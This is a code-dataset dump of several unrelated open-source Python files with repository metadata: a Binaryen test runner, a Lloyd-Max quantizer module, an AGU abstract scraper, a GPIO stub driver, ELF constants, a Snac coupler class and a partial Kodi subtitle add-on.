with open('a.wasm', 'rb') as output:
index = output.read().find(b'dylink')
print(' ', index)
assert index == 11, 'dylink section must be first, right after the magic number etc.'
def run_ctor_eval_tests():
print('\n[ checking wasm-ctor-eval... ]\n')
for t in shared.get_tests(shared.get_test_dir('ctor-eval'), ['.wast', '.wasm']):
print('..', os.path.basename(t))
ctors = open(t + '.ctors').read().strip()
cmd = shared.WASM_CTOR_EVAL + [t, '-all', '-o', 'a.wat', '-S', '--ctors', ctors]
support.run_command(cmd)
actual = open('a.wat').read()
out = t + '.out'
shared.fail_if_not_identical_to_file(actual, out)
def run_wasm_metadce_tests():
print('\n[ checking wasm-metadce ]\n')
for t in shared.get_tests(shared.get_test_dir('metadce'), ['.wast', '.wasm']):
print('..', os.path.basename(t))
graph = t + '.graph.txt'
cmd = shared.WASM_METADCE + [t, '--graph-file=' + graph, '-o', 'a.wat', '-S', '-all']
stdout = support.run_command(cmd)
expected = t + '.dced'
with open('a.wat') as seen:
shared.fail_if_not_identical_to_file(seen.read(), expected)
shared.fail_if_not_identical_to_file(stdout, expected + '.stdout')
def run_wasm_reduce_tests():
if not shared.has_shell_timeout():
print('\n[ skipping wasm-reduce testcases]\n')
return
print('\n[ checking wasm-reduce testcases]\n')
# fixed testcases
for t in shared.get_tests(shared.get_test_dir('reduce'), ['.wast']):
print('..', os.path.basename(t))
# convert to wasm
support.run_command(shared.WASM_AS + [t, '-o', 'a.wasm', '-all'])
support.run_command(shared.WASM_REDUCE + ['a.wasm', '--command=%s b.wasm --fuzz-exec -all ' % shared.WASM_OPT[0], '-t', 'b.wasm', '-w', 'c.wasm', '--timeout=4'])
expected = t + '.txt'
support.run_command(shared.WASM_DIS + ['c.wasm', '-o', 'a.wat'])
with open('a.wat') as seen:
shared.fail_if_not_identical_to_file(seen.read(), expected)
# run on a nontrivial fuzz testcase, for general coverage
# this is very slow in ThreadSanitizer, so avoid it there
if 'fsanitize=thread' not in str(os.environ):
print('\n[ checking wasm-reduce fuzz testcase ]\n')
# TODO: re-enable multivalue once it is better optimized
support.run_command(shared.WASM_OPT + [os.path.join(shared.options.binaryen_test, 'signext.wast'), '-ttf', '-Os', '-o', 'a.wasm', '--detect-features', '--disable-multivalue'])
before = os.stat('a.wasm').st_size
support.run_command(shared.WASM_REDUCE + ['a.wasm', '--command=%s b.wasm --fuzz-exec --detect-features' % shared.WASM_OPT[0], '-t', 'b.wasm', '-w', 'c.wasm'])
after = os.stat('c.wasm').st_size
# This number is a custom threshold to check if we have shrunk the
# output sufficiently
assert after < 0.85 * before, [before, after]
def run_spec_tests():
print('\n[ checking wasm-shell spec testcases... ]\n')
for wast in shared.options.spec_tests:
base = os.path.basename(wast)
print('..', base)
# windows has some failures that need to be investigated
if base == 'names.wast' and shared.skip_if_on_windows('spec: ' + base):
continue
def run_spec_test(wast):
cmd = shared.WASM_SHELL + [wast]
output = support.run_command(cmd, stderr=subprocess.PIPE)
# filter out binaryen interpreter logging that the spec suite
# doesn't expect
filtered = [line for line in output.splitlines() if not line.startswith('[trap')]
return '\n'.join(filtered) + '\n'
def run_opt_test(wast):
# check optimization validation
cmd = shared.WASM_OPT + [wast, '-O', '-all']
support.run_command(cmd)
def check_expected(actual, expected):
if expected and os.path.exists(expected):
expected = open(expected).read()
print(' (using expected output)')
actual = actual.strip()
expected = expected.strip()
if actual != expected:
shared.fail(actual, expected)
expected = os.path.join(shared.get_test_dir('spec'), 'expected-output', base + '.log')
# some spec tests should fail (actual process failure, not just assert_invalid)
try:
actual = run_spec_test(wast)
except Exception as e:
if ('wasm-validator error' in str(e) or 'parse exception' in str(e)) and '.fail.' in base:
print('<< test failed as expected >>')
continue # don't try all the binary format stuff TODO
else:
shared.fail_with_error(str(e))
check_expected(actual, expected)
# skip binary checks for tests that reuse previous modules by name, as that's a wast-only feature
if 'exports.wast' in base: # FIXME
continue
run_spec_test(wast)
# check binary format. here we can verify execution of the final
# result, no need for an output verification
# some wast files cannot be split:
# * comments.wast: contains characters that are not valid utf-8,
# so our string splitting code fails there
# FIXME Remove reference type tests from this list after nullref is
# implemented in V8
if base not in ['comments.wast', 'ref_null.wast', 'ref_is_null.wast', 'ref_func.wast', 'old_select.wast']:
split_num = 0
actual = ''
with open('spec.wast', 'w') as transformed_spec_file:
for module, asserts in support.split_wast(wast):
print(' testing split module', split_num)
split_num += 1
support.write_wast('split.wast', module, asserts)
run_opt_test('split.wast') # also that our optimizer doesn't break on it
result_wast_file = shared.binary_format_check('split.wast', verify_final_result=False, original_wast=wast)
with open(result_wast_file) as f:
result_wast = f.read()
# add the asserts, and verify that the test still passes
transformed_spec_file.write(result_wast + '\n' + '\n'.join(asserts))
# compare all the outputs to the expected output
actual = run_spec_test('spec.wast')
check_expected(actual, os.path.join(shared.get_test_dir('spec'), 'expected-output', base + '.log'))
def run_validator_tests():
print('\n[ running validation tests... ]\n')
# Ensure the tests validate by default
cmd = shared.WASM_AS + [os.path.join(shared.get_test_dir('validator'), 'invalid_export.wast'), '-o', 'a.wasm']
support.run_command(cmd)
cmd = shared.WASM_AS + [os.path.join(shared.get_test_dir('validator'), 'invalid_import.wast'), '-o', 'a.wasm']
support.run_command(cmd)
cmd = shared.WASM_AS + ['--validate=web', os.path.join(shared.get_test_dir('validator'), 'invalid_export.wast'), '-o', 'a.wasm']
support.run_command(cmd, expected_status=1)
cmd = shared.WASM_AS + ['--validate=web', os.path.join(shared.get_test_dir('validator'), 'invalid_import.wast'), '-o', 'a.wasm']
support.run_command(cmd, expected_status=1)
cmd = shared.WASM_AS + ['--validate=none', os.path.join(shared.get_test_dir('validator'), 'invalid_return.wast'), '-o', 'a.wasm']
support.run_command(cmd)
cmd = shared.WASM_AS + [os.path.join(shared.get_test_dir('validator'), 'invalid_number.wast'), '-o', 'a.wasm']
support.run_command(cmd, expected_status=1)
def run_example_tests():
print('\n[ checking native example testcases...]\n')
if not shared.NATIVECC or not shared.NATIVEXX:
shared.fail_with_error('Native compiler (e.g. gcc/g++) was not found in PATH!')
return
# windows + gcc will need some work
if shared.skip_if_on_windows('example'):
return
for t in shared.get_tests(shared.get_test_dir('example')):
output_file = 'example'
cmd = ['-I' + os.path.join(shared.options.binaryen_root, 't'), '-g', '-pthread', '-o', output_file]
if not t.endswith(('.c', '.cpp')):
continue
src = os.path.join(shared.get_test_dir('example'), t)
expected = os.path.join(shared.get_test_dir('example'), '.'.join(t.split('.')[:-1]) + '.txt')
# build the C file separately
libpath = shared.options.binaryen_lib
extra = [shared.NATIVECC, src, '-c', '-o', 'example.o',
'-I' + os.path.join(shared.options.binaryen_root, 'src'), '-g', '-L' + libpath, '-pthread']
if src.endswith('.cpp'):
extra += ['-std=c++' + str(shared.cxx_standard)]
if os.environ.get('COMPILER_FLAGS'):
for f in os.environ.get('COMPILER_FLAGS').split(' '):
extra.append(f)
print('build: ', ' '.join(extra))
subprocess.check_call(extra)
# Link against the binaryen C library DSO, using an executable-relative rpath
cmd = ['example.o', '-L' + libpath, '-lbinaryen'] + cmd + ['-Wl,-rpath,' + libpath]
print(' ', t, src, expected)
if os.environ.get('COMPILER_FLAGS'):
for f in os.environ.get('COMPILER_FLAGS').split(' '):
cmd.append(f)
cmd = [shared.NATIVEXX, '-std=c++' + str(shared.cxx_standard)] + cmd
print('link: ', ' '.join(cmd))
subprocess.check_call(cmd)
print('run...', output_file)
actual = subprocess.check_output([os.path.abspath(output_file)]).decode('utf-8')
os.remove(output_file)
shared.fail_if_not_identical_to_file(actual, expected)
def run_unittest():
print('\n[ checking unit tests...]\n')
# equivalent to `python -m unittest discover -s ./test -v`
suite = unittest.defaultTestLoader.discover(os.path.dirname(shared.options.binaryen_test))
result = unittest.TextTestRunner(verbosity=2, failfast=shared.options.abort_on_first_failure).run(suite)
shared.num_failures += len(result.errors) + len(result.failures)
if shared.options.abort_on_first_failure and shared.num_failures:
raise Exception("unittest failed")
def run_lit():
def run():
lit_script = os.path.join(shared.options.binaryen_bin, 'binaryen-lit')
lit_tests = os.path.join(shared.options.binaryen_root, 'test', 'lit')
# lit expects to be run as its own executable
cmd = [sys.executable, lit_script, lit_tests, '-vv']
result = subprocess.run(cmd)
if result.returncode != 0:
shared.num_failures += 1
if shared.options.abort_on_first_failure and shared.num_failures:
raise Exception("lit test failed")
shared.with_pass_debug(run)
TEST_SUITES = OrderedDict([
('version', run_version_tests),
('wasm-opt', wasm_opt.test_wasm_opt),
('wasm-dis', run_wasm_dis_tests),
('crash', run_crash_tests),
('dylink', run_dylink_tests),
('ctor-eval', run_ctor_eval_tests),
('wasm-metadce', run_wasm_metadce_tests),
('wasm-reduce', run_wasm_reduce_tests),
('spec', run_spec_tests),
('lld', lld.test_wasm_emscripten_finalize),
('wasm2js', wasm2js.test_wasm2js),
('validator', run_validator_tests),
('example', run_example_tests),
('unit', run_unittest),
('binaryenjs', binaryenjs.test_binaryen_js),
('binaryenjs_wasm', binaryenjs.test_binaryen_wasm),
('lit', run_lit),
])
# Run all the tests
def main():
all_suites = TEST_SUITES.keys()
skip_by_default = ['binaryenjs', 'binaryenjs_wasm']
if shared.options.list_suites:
for suite in all_suites:
print(suite)
return 0
for r in shared.requested:
if r not in all_suites:
print('invalid test suite: %s (see --list-suites)\n' % r)
return 1
if not shared.requested:
shared.requested = [s for s in all_suites if s not in skip_by_default]
for test in shared.requested:
TEST_SUITES[test]()
# Check/display the results
if shared.num_failures == 0:
print('\n[ success! ]')
if shared.warnings:
print('\n' + '\n'.join(shared.warnings))
if shared.num_failures > 0:
print('\n[ ' + str(shared.num_failures) + ' failures! ]')
return 1
return 0
if __name__ == '__main__':
sys.exit(main())
| apache-2.0 | 290,767,472,295,077,600 | 40.982188 | 183 | 0.601491 | false | 3.472743 | true | false | false |
eliasrg/SURF2017 | code/separate/coding/source/__init__.py | 1 | 5800 | # Copyright (c) 2017 Elias Riedel Gårding
# Licensed under the MIT License
import numpy as np
from scipy.interpolate import interp1d
from scipy.signal import convolve
import matplotlib.pyplot as plt
from . import lloyd_max
class Encoder:
def __init__(self, sim, tracker):
self.sim = sim
self.tracker = tracker
def encode(self, *msg):
# Just encode it with Lloyd-Max
# (pass it to channel encoder or digital channel)
i = self.tracker.lm_encoder.encode(*msg)
self.tracker.update(i)
return (i,)
def get_tracker(self):
return self.tracker
class Decoder:
def __init__(self, sim, tracker):
self.sim = sim
self.tracker = tracker
def clone(self):
return self.__class__(self.sim, self.tracker.clone())
def decode(self, *msg):
# Decode with the Lloyd-Max decoder
# (receive from channel encoder or digital channel)
x_est = self.tracker.lm_decoder.decode(*msg)
# Update the distribution tracker
assert len(msg) == 1 # One integer
i = msg[0]
self.tracker.update(i)
return (x_est,)
# Hikmet's code
# Constants
RESOLUTION=1<<7
class Distribution:
def __init__(self, interval, pdf):
self.interval=interval
self.pdf=pdf
self.is_hikmet = True
@classmethod
def bySamples(cls, x, fx): # Interpolate to get the pdf
# Use logarithmic interpolation to preserve log-concavity
dx=x[1]-x[0]
fx=np.array(fx, dtype = float) / sum(fx) / dx
Fx=np.cumsum(fx)*dx
v1 = sum(1 for i in Fx if i < 1e-5)
v2 = sum(1 for i in Fx if i < 1-1e-5)
x=x[v1:v2]
fx=fx[v1:v2]
fx=np.array(fx, dtype = float) / sum(fx) / dx
logfx=np.log(fx)
logpdf=interp1d(x, logfx, kind='linear',
bounds_error=False, fill_value=float('-inf'))
pdf = lambda t : np.exp(logpdf(t))
return cls((x[0],x[-1]), pdf)
def convolution(d1, d2):
a1,b1 = d1.interval
a2,b2 = d2.interval
delta = max(b1-a1,b2-a2) / float(RESOLUTION)
f1=[d1.pdf(i) for i in np.arange(a1,b1,delta)]
f2=[d2.pdf(i) for i in np.arange(a2,b2,delta)]
fx=convolve(f1, f2)
x=[a1+a2+delta*i for i in range(len(fx))]
return Distribution.bySamples(x, fx)
def LM(distribution, n):
# Some definitions
maxiter=1<<10
N=RESOLUTION
a,b = distribution.interval
x=np.linspace(a,b,N)
fx=np.array([distribution.pdf(i) for i in x])
fx[np.isnan(fx)]=0
dx=(b-a) / (N-1.)
Fx=np.cumsum(fx)*dx
index=lambda y: int(min(N-1, max(0, np.round((y-a) / float(dx)))))
# Initialization
c=np.zeros(n)
p=np.array([x[int(i)] for i in np.round(np.linspace(0, N, num=n+1)[1:-1])])
# Loop
error=1
iteration=0
while error > 0 and iteration<maxiter:
iteration +=1
# centers from boundaries
pin=[0]+[index(i) for i in p]+[N-1]
for i in range(n):
c[i]=sum(x[j]*fx[j] for j in range(pin[i],pin[i+1]+1))\
/sum( fx[j] for j in range(pin[i],pin[i+1]+1))
pin_temp=pin
# boundaries from centers
p=(c[:-1]+c[1:]) / 2.
pin=[0]+[index(i) for i in p] + [N-1]
error=sum(abs(pin_temp[i]-pin[i]) for i in range(n+1))
return ([a]+list(p)+[b],c)
class DistributionTracker:
"""Keeps track of the distribution of the plant's state."""
def __init__(self, sim, n_levels, distr=None,
lm_encoder=None, lm_decoder=None):
self.sim = sim
self.n_levels = n_levels
if distr is None:
assert lm_encoder is None and lm_decoder is None
W = self.sim.params.W
self.fw = Distribution((-10,10),
lambda x : W * np.exp(-x**2 / 2.) / np.sqrt(2.0 * np.pi)
)# pdf of w_t: N(0,W) with support (-10,10)
self.distr = self.fw
boundaries, levels = LM(self.distr,
2**self.sim.params.quantizer_bits)
self.lm_encoder = lloyd_max.Encoder(boundaries)
self.lm_decoder = lloyd_max.Decoder(levels, boundaries)
else:
assert lm_encoder is not None and lm_decoder is not None
self.distr = distr
self.lm_encoder = lm_encoder
self.lm_decoder = lm_decoder
# DEBUG
self.distrs = []
def clone(self):
new = self.__class__(self.sim, self.n_levels, self.distr,
self.lm_encoder, self.lm_decoder)
# DEBUG
new.distrs = self.distrs[:]
if hasattr(self, 'x'): new.x = self.x
if hasattr(self, 'fx'): new.fx = self.fx
if hasattr(self, 'w_x'): new.w_x = self.w_x
if hasattr(self, 'w_fx'): new.w_fx = self.w_fx
if hasattr(self, 'd1'): new.d1 = self.d1
if hasattr(self, 'fw'): new.fw = self.fw
return new
def update(self, i, debug_globals=dict()):
A = self.sim.params.alpha
L = self.sim.params.L(self.sim.t)
x_hat = self.lm_decoder.decode(i)
u = -L * x_hat
lo, hi = self.lm_decoder.get_interval(i)
lo = max(lo, self.distr.interval[0])
hi = min(hi, self.distr.interval[1])
self.d1 = Distribution((A*lo+u,A*hi+u), lambda x: self.distr.pdf((x-u) / float(A)))
self.distr = Distribution.convolution(self.d1, self.fw)
self.distrs.append(self.distr) # DEBUG
# DEBUG: For inspecting the local variables interactively
debug_globals.update(locals())
boundaries, levels = LM(self.distr, 2**self.sim.params.quantizer_bits)
self.lm_encoder = lloyd_max.Encoder(boundaries)
self.lm_decoder = lloyd_max.Decoder(levels, boundaries)
| mit | -8,962,764,819,531,782,000 | 31.216667 | 91 | 0.565442 | false | 3.111052 | false | false | false |
khundman/facetview | agu/agu_scrape.py | 1 | 1881 | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
from selenium.webdriver.support import expected_conditions as EC
import time
output = "/users/hundman/documents/data_science/hyspiri_search/facetview-hyspiri-public/agu/"
driver = webdriver.Firefox()
start = 50000
stop = 100000
with open(output + "index", "a") as out:
found = 0
for num in range(start,stop):
# try:
driver.get("https://agu.confex.com/agu/fm15/meetingapp.cgi/Paper/" + str(num))
paper = None
print str(num)
try:
load_time = 3
if num == start:
load_time = 10
WebDriverWait(driver, load_time).until(EC.presence_of_element_located((By.CSS_SELECTOR, "section.item.People")))
time.sleep(3)
content = driver.find_element_by_id("main")
paper = True
except:
paper = False
if paper == True:
abstract = content.find_element_by_css_selector("section.item.Additional")
abstract = abstract.text
if len(abstract) > 1:
found += 1
print "found: " + str(found)
title = content.find_element_by_css_selector("li.itemTitle").text
all_auths = ""
auth_affils = ""
authors = content.find_elements(By.CSS_SELECTOR, "li.RoleListItem")
for auth in authors:
affil = auth.find_element_by_tag_name("span").text
all_auths += auth.find_element_by_tag_name("a").text + "::" + affil + "||"
string = '{ "index" : { "_index" : "agu_2015", "_type" : "type1", "_id" : "%s" } }\n' %(num)
out.write(string)
doc = '''{"authors":"%s", "title":"%s", "abstract":"%s"} \n''' %(all_auths, title, abstract)
out.write(doc.encode('utf-8'))
# except:
# print "issue with: " + str(cnt)
# cnt += 1
print "found: " + str(found)
out.write("\n")
driver.close()
#53876 | apache-2.0 | 5,617,017,469,024,694,000 | 29.852459 | 146 | 0.624668 | false | 2.952904 | false | false | false |
kervi/kervi | kervi-hal-win/kervi/platforms/windows/gpio.py | 2 | 1575 | from kervi.hal.gpio import IGPIODeviceDriver
class GPIODriver(IGPIODeviceDriver):
def __init__(self, gpio_id="generic_gpio"):
IGPIODeviceDriver.__init__(self, gpio_id)
pass
def _get_channel_type(self, channel):
from kervi.hal.gpio import CHANNEL_TYPE_GPIO, CHANNEL_TYPE_ANALOG_IN, CHANNEL_TYPE_ANALOG_OUT
if channel in ["GPIO1", "GPIO2", "GPIO3"]:
return CHANNEL_TYPE_GPIO
elif channel in ["DAC1", "DAC2"]:
return CHANNEL_TYPE_ANALOG_OUT
elif channel in ["ADC1", "ADC2"]:
return CHANNEL_TYPE_ANALOG_IN
def _get_channel_names(self):
return ["GPIO1", "GPIO2", "GPIO3", "DAC1", "DAC2", "ADC1", "ADC2"]
@property
def name(self):
return "Generic GPIO"
def define_as_input(self, pin, pullup=None, bounce_time=0):
print("define pin in")
def define_as_output(self, pin):
print("define pin out")
def define_as_pwm(self, pin, frequency, duty_cycle):
print("define pwm")
def set(self, pin, state):
print("set pin", state)
def get(self, pin):
print("get pin")
return 0
def pwm_start(self, channel, duty_cycle=None, frequency=None):
print("start pwm")
def pwm_stop(self, pin):
print("stop pwm")
def listen(self, pin, callback, bounce_time=0):
print("listen rising")
def listen_rising(self, pin, callback, bounce_time=0):
print("listen rising")
def listen_falling(self, pin, callback, bounce_time=0):
print("listen falling")
| mit | -6,191,158,839,289,138,000 | 27.636364 | 101 | 0.604444 | false | 3.32981 | false | false | false |
pombredanne/pyelftools | elftools/elf/constants.py | 1 | 3168 | #-------------------------------------------------------------------------------
# elftools: elf/constants.py
#
# Constants and flags, placed into classes for namespacing
#
# Eli Bendersky ([email protected])
# This code is in the public domain
#-------------------------------------------------------------------------------
class E_FLAGS(object):
""" Flag values for the e_flags field of the ELF header
"""
EF_ARM_EABIMASK=0xFF000000
EF_ARM_EABI_VER1=0x01000000
EF_ARM_EABI_VER2=0x02000000
EF_ARM_EABI_VER3=0x03000000
EF_ARM_EABI_VER4=0x04000000
EF_ARM_EABI_VER5=0x05000000
EF_ARM_GCCMASK=0x00400FFF
EF_ARM_RELEXEC=0x01
EF_ARM_HASENTRY=0x02
EF_ARM_SYMSARESORTED=0x04
EF_ARM_DYNSYMSUSESEGIDX=0x8
EF_ARM_MAPSYMSFIRST=0x10
EF_ARM_LE8=0x00400000
EF_ARM_BE8=0x00800000
EF_ARM_ABI_FLOAT_SOFT=0x00000200
EF_ARM_ABI_FLOAT_HARD=0x00000400
EF_MIPS_NOREORDER=1
EF_MIPS_PIC=2
EF_MIPS_CPIC=4
EF_MIPS_XGOT=8
EF_MIPS_64BIT_WHIRL=16
EF_MIPS_ABI2=32
EF_MIPS_ABI_ON32=64
EF_MIPS_32BITMODE = 256
EF_MIPS_NAN2008=1024
EF_MIPS_ARCH=0xf0000000
EF_MIPS_ARCH_1=0x00000000
EF_MIPS_ARCH_2=0x10000000
EF_MIPS_ARCH_3=0x20000000
EF_MIPS_ARCH_4=0x30000000
EF_MIPS_ARCH_5=0x40000000
EF_MIPS_ARCH_32=0x50000000
EF_MIPS_ARCH_64=0x60000000
EF_MIPS_ARCH_32R2=0x70000000
EF_MIPS_ARCH_64R2=0x80000000
class E_FLAGS_MASKS(object):
"""Masks to be used for convenience when working with E_FLAGS
This is a simplified approach that is also used by GNU binutils
readelf
"""
EFM_MIPS_ABI = 0x0000F000
EFM_MIPS_ABI_O32 = 0x00001000
EFM_MIPS_ABI_O64 = 0x00002000
EFM_MIPS_ABI_EABI32 = 0x00003000
EFM_MIPS_ABI_EABI64 = 0x00004000
class SHN_INDICES(object):
""" Special section indices
"""
SHN_UNDEF=0
SHN_LORESERVE=0xff00
SHN_LOPROC=0xff00
SHN_HIPROC=0xff1f
SHN_ABS=0xfff1
SHN_COMMON=0xfff2
SHN_HIRESERVE=0xffff
class SH_FLAGS(object):
""" Flag values for the sh_flags field of section headers
"""
SHF_WRITE=0x1
SHF_ALLOC=0x2
SHF_EXECINSTR=0x4
SHF_MERGE=0x10
SHF_STRINGS=0x20
SHF_INFO_LINK=0x40
SHF_LINK_ORDER=0x80
SHF_OS_NONCONFORMING=0x100
SHF_GROUP=0x200
SHF_TLS=0x400
SHF_COMPRESSED=0x800
SHF_MASKOS=0x0ff00000
SHF_EXCLUDE=0x80000000
SHF_MASKPROC=0xf0000000
class P_FLAGS(object):
""" Flag values for the p_flags field of program headers
"""
PF_X=0x1
PF_W=0x2
PF_R=0x4
PF_MASKOS=0x00FF0000
PF_MASKPROC=0xFF000000
# symbol info flags for entries
# in the .SUNW_syminfo section
class SUNW_SYMINFO_FLAGS(object):
""" Flags for the si_flags field of entries
in the .SUNW_syminfo section
"""
SYMINFO_FLG_DIRECT=0x1
SYMINFO_FLG_FILTER=0x2
SYMINFO_FLG_COPY=0x4
SYMINFO_FLG_LAZYLOAD=0x8
SYMINFO_FLG_DIRECTBIND=0x10
SYMINFO_FLG_NOEXTDIRECT=0x20
SYMINFO_FLG_AUXILIARY=0x40
SYMINFO_FLG_INTERPOSE=0x80
SYMINFO_FLG_CAP=0x100
SYMINFO_FLG_DEFERRED=0x200
class VER_FLAGS(object):
VER_FLG_BASE=0x1
VER_FLG_WEAK=0x2
VER_FLG_INFO=0x4
| unlicense | 5,769,264,028,461,571,000 | 24.344 | 80 | 0.651515 | false | 2.452012 | false | false | false |
bmi-forum/bmi-pyre | Snac/pyre/SnacCoupler.py | 5 | 1655 | #!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
def coupler(name="coupler", facility="coupler"):
return Coupler(name, facility)
from pyre.components.Component import Component
class Coupler(Component):
def __init__(self, name, facility):
Component.__init__(self, name, facility)
self.exchanger = None
return
def initialize(self, solver):
# exchanger could be either a FineGridExchanger (FGE)
# or a CoarseGridExchanger (CGE)
self.exchanger = solver.exchanger
self.exchanger.initialize(solver)
return
def launch(self, solver):
self.exchanger.launch(solver)
return
def initTemperature(self):
## # send initial temperature field from CGE to FGE
## self.exchanger.initTemperature()
return
def preVSolverRun(self):
self.exchanger.preVSolverRun()
return
def postVSolverRun(self):
self.exchanger.postVSolverRun()
return
def newStep(self):
self.exchanger.NewStep()
return
def applyBoundaryConditions(self):
self.exchanger.applyBoundaryConditions()
return
def stableTimestep(self, dt):
dt = self.exchanger.stableTimestep(dt)
return dt
def endTimestep(self, steps, done):
done = self.exchanger.endTimestep(steps,done)
return done
# version
__id__ = "$Id: SnacCoupler.py 1902 2004-08-19 18:23:55Z EunseoChoi $"
# End of file
| gpl-2.0 | 263,631,159,940,753,440 | 17.595506 | 80 | 0.567976 | false | 3.857809 | false | false | false |
kugan49/xbmc-betaseries | service.subtitles.betaseries/service.py | 2 | 19136 | # -*- coding: utf-8 -*-
import xbmc, xbmcaddon, xbmcgui, xbmcplugin, xbmcvfs
import os, sys, re, string, urllib, urllib2, socket, unicodedata, shutil, time, platform
import simplejson as json
__addon__ = xbmcaddon.Addon()
__addonid__ = __addon__.getAddonInfo('id')
__addonname__ = __addon__.getAddonInfo('name')
__addonversion__ = __addon__.getAddonInfo('version')
__icon__ = __addon__.getAddonInfo('icon')
__language__ = __addon__.getLocalizedString
__platform__ = platform.system() + " " + platform.release()
__profile__ = xbmc.translatePath( __addon__.getAddonInfo('profile') ).decode("utf-8")
__temp__ = xbmc.translatePath( os.path.join( __profile__, 'temp') ).decode("utf-8")
sys.path.append( os.path.join( __profile__, "lib") )
self_host = "http://api.betaseries.com"
self_apikey = "5a85a0adc953"
self_apiver = "2.4"
self_team_pattern = re.compile(r".*-([^-]+)$")
self_notify = __addon__.getSetting('notify') == 'true'
TEAMS = (
# SD[0] HD[1]
("lol|sys|dim", "dimension"),
("asap|xii|fqm|imm", "immerse|orenji"),
("excellence", "remarkable"),
("2hd|xor", "ctu"),
("tla", "bia"))
LANGUAGES = (
# [0] [1]
("br", "pt"),
("gr", "el"))
def other_team(team, team_from, team_to):
# get other team using TEAMS table
for x in TEAMS:
if len(re.findall(x[team_from], team)) > 0:
return x[team_to]
# return team if not found
log("other team not found")
return team
def normalize_lang(lang, lang_from, lang_to):
# normalize lang using LANGUAGES table
for x in LANGUAGES:
if len(re.findall(x[lang_from], lang)) > 0:
return x[lang_to]
# return lang if not found
return lang
def normalize_string(txt):
return unicodedata.normalize('NFKD', txt).encode('ascii', 'ignore')
def log(txt, level=xbmc.LOGDEBUG):
message = u'%s: %s' % (__addonid__, txt)
xbmc.log(msg=message, level=level)
def set_user_agent():
json_query = json.loads(xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "method": "Application.GetProperties", "params": {"properties": ["version", "name"]}, "id": 1 }'))
try:
major = str(json_query['result']['version']['major'])
minor = str(json_query['result']['version']['minor'])
name = "Kodi" if int(major) >= 14 else "XBMC"
version = "%s %s.%s" % (name, major, minor)
except:
log("could not get app version")
version = "XBMC"
return "Mozilla/5.0 (compatible; " + __platform__ + "; " + version + "; " + __addonid__ + "/" + __addonversion__ + ")"
def get_params(string=""):
param=[]
if string == "":
paramstring=sys.argv[2]
else:
paramstring=string
if len(paramstring)>=2:
params=paramstring
cleanedparams=params.replace('?','')
if (params[len(params)-1]=='/'):
params=params[0:len(params)-2]
pairsofparams=cleanedparams.split('&')
param={}
for i in range(len(pairsofparams)):
splitparams={}
splitparams=pairsofparams[i].split('=')
if (len(splitparams))==2:
param[splitparams[0]]=splitparams[1]
return param
def get_url(url, referer=self_host):
req_headers = {
'User-Agent': self_user_agent,
'Cache-Control': 'no-store, no-cache, must-revalidate',
'Pragma': 'no-cache',
'Referer': referer}
request = urllib2.Request(url, headers=req_headers)
opener = urllib2.build_opener()
try:
response = opener.open(request)
contents = response.read()
return contents
except urllib2.HTTPError, e:
log('HTTPError = ' + str(e.code), xbmc.LOGERROR)
if e.code == 400:
return False
except urllib2.URLError, e:
log('URLError = ' + str(e.reason), xbmc.LOGERROR)
except Exception:
import traceback
log('generic exception: ' + traceback.format_exc(), xbmc.LOGERROR)
# when error occured
if self_notify:
xbmc.executebuiltin((u'Notification(%s,%s,%s,%s)' % (__addonname__, __language__(30008), 750, __icon__)).encode('utf-8', 'ignore'))
return False
def download_subtitle(url, ext, subversion, referer):
# name of temp file for download
local_tmp_file = os.path.join(__temp__, "betaseries." + ext)
log("downloading url : %s" % (url))
socket.setdefaulttimeout(15)
content = get_url(url, referer)
if content:
local_file_handle = open(local_tmp_file, "w" + "b")
local_file_handle.write(content)
local_file_handle.close()
log("file extension is : %s" % (ext))
if ext in ['zip','rar']:
files = os.listdir(__temp__)
init_filecount = len(files)
log("number of files : %s" % (init_filecount))
filecount = init_filecount
log("extracting zip file : %s" % (local_tmp_file))
xbmc.executebuiltin("XBMC.Extract(" + local_tmp_file + "," + __temp__ +")")
waittime = 0
while (filecount == init_filecount) and (waittime < 20): # nothing yet extracted
time.sleep(1) # wait 1 second to let the builtin function 'XBMC.extract' unpack
files = os.listdir(__temp__)
filecount = len(files)
waittime = waittime + 1
# if max waittime reached
if waittime == 20:
log("error unpacking files in : %s" % (__temp__))
else:
log("unpacked files in : %s" % (__temp__))
time.sleep(1)
files = os.listdir(__temp__)
log("looking for %s" % (subversion))
for filename in files:
log("checking file %s" % (filename))
if normalize_string(filename) == subversion:
filepath = os.path.normpath(os.path.join(__temp__, filename))
log("selected file : %s" % (filename))
return filepath
else:
log("selected file : %s" % (subversion))
return local_tmp_file
else:
return False
def search_subtitles(search):
subtitles = []
log("entering search_subtitles()")
if search['mode'] == "movie":
log("movies not supported!")
return False
# get video file name
dirsync = __addon__.getSetting('dirsync') == 'true'
if dirsync:
# get directory name as filename
filename = os.path.basename(os.path.dirname(search['path'])).lower()
else:
# or use filename
filename = os.path.basename(search['path']).lower()
# and remove file extension
filename = re.sub(r"\.[^.]+$", "", filename)
filename = normalize_string(filename)
log("after filename = %s" % (filename))
# if file, check if valid tvshow
if search['mode'] == "file" and not re.search(r"(?i)(s[0-9]+e[0-9]+|[0-9]+x?[0-9]{2,})", filename):
log("not a tvshow or badly named!")
return False
# get subtitle team
subteams = []
subteams.append(filename.replace(".","-"))
if len(subteams[0]) > 0:
# get team name (everything after "-")
subteams[0] = self_team_pattern.match("-" + subteams[0]).groups()[0].lower()
# find equivalent teams, if any
tmp = other_team(subteams[0],0,1)
if len(tmp) > 0 and tmp != subteams[0]:
subteams.append(tmp)
# find other equivalent teams, if any
tmp = other_team(subteams[0],1,0)
if len(tmp) > 0 and tmp != subteams[0]:
subteams.append(tmp)
log("after subteams = %s" % (subteams))
# configure socket
socket.setdefaulttimeout(10)
# define default url to get betaseries episode id from filename
episodeurl = "%s/episodes/scraper?file=%s&key=%s&v=%s" % (self_host, urllib.quote(filename), self_apikey, self_apiver)
# check video type
if search['mode'] == "tvshow":
# get playerid
json_query = '{"jsonrpc": "2.0", "method": "Player.GetActivePlayers", "id": 1}'
playerid = json.loads(xbmc.executeJSONRPC(json_query))['result'][0]['playerid']
# get tvshowid
